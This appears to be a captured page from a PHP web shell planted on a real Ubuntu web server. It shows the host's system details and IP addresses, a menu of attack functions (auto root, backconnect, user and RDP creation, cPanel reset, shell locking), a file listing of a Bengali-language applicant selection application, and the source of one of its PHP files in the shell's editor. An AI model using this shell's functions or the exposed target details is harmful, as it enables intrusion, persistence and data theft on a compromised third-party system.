Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 3.133.13.2
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
eedpims /
applicantselection /
[ HOME SHELL ]
Name
Size
Permission
Action
111ajaxview.php
1.24
KB
-rw-r--r--
222report_indproduct_sale.php
4.05
KB
-rw-r--r--
ajaxapplicant.php
4.72
KB
-rw-r--r--
ajaxselection.php
2.88
KB
-rw-r--r--
applicant_callingpage.php
419
B
-rw-r--r--
applicant_editor.php
5.83
KB
-rw-r--r--
applicantselection.php
3.7
KB
-rw-r--r--
applicantselection_editor.php
2.9
KB
-rw-r--r--
applicantselection_list.php
6.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : applicantselection_editor.php
<?php include("../homepage/header.php"); include("../homepage/headermenu.php"); ?> <div class="container fullheight"> <div class="row"> <div class="col-md-8 col-md-offset-2"> <br/> <div><font class="headline">প্রার্থী নির্বাচন করুন</font></div> <div style="background-color: #ff0000;height: 2px"> </div> <div align="right"><a href="applicantselection.php?cmd=list">লিস্ট দেখুন</a></font></div> <div class="div-ln"> <br/> <form name="frm_applicantselection" method="post" enctype="multipart/form-data" class="form-horizontal"> <div class="form-group"> <label class="col-md-4 control-label">ব্যাচ শিরোনাম</label> <div class="col-md-6"> <?php // prepare and bind $stmt = $conn->prepare("SELECT * FROM trevent"); $stmt->execute(); //Result $result = $stmt->get_result(); ?> <select name="trevent_id" id="trevent_id" class="form-control" onchange="showUser(this.value)"> <option value="">--Select--</option> <?php while($row = $result->fetch_assoc()) { ?> <option value="<?=$row["id"]?>" <?php if($row["id"]==$trevent_id){ echo "selected"; }?>><?=$row["trevnID"]?>-<?=$row["subject"]?> </option> <?php } $stmt->close(); ?> </select> </div> </div> <div id="txtHint"> </div> <div class="form-group"> <div class="col-md-6 col-md-offset-4"> <input type="hidden" name="cmd" value="add"> <input type="hidden" name="id" value="<?=$Id?>"> <button type="submit" class="btn btn-primary"> <i class="fa fa-btn fa-sign-in"></i>Submit </button> </div> </div> </form> </div> </div> </div> </div> <?php include("../homepage/footer.php"); ?> <script> function showUser(str) { if (str=="") { document.getElementById("txtHint").innerHTML=""; return; } var xmlhttp=new XMLHttpRequest(); xmlhttp.onreadystatechange=function() { if (this.readyState==4 && this.status==200) { document.getElementById("txtHint").innerHTML=this.responseText; } } xmlhttp.open("GET","ajaxselection.php?q="+str,true); xmlhttp.send(); } </script>
Close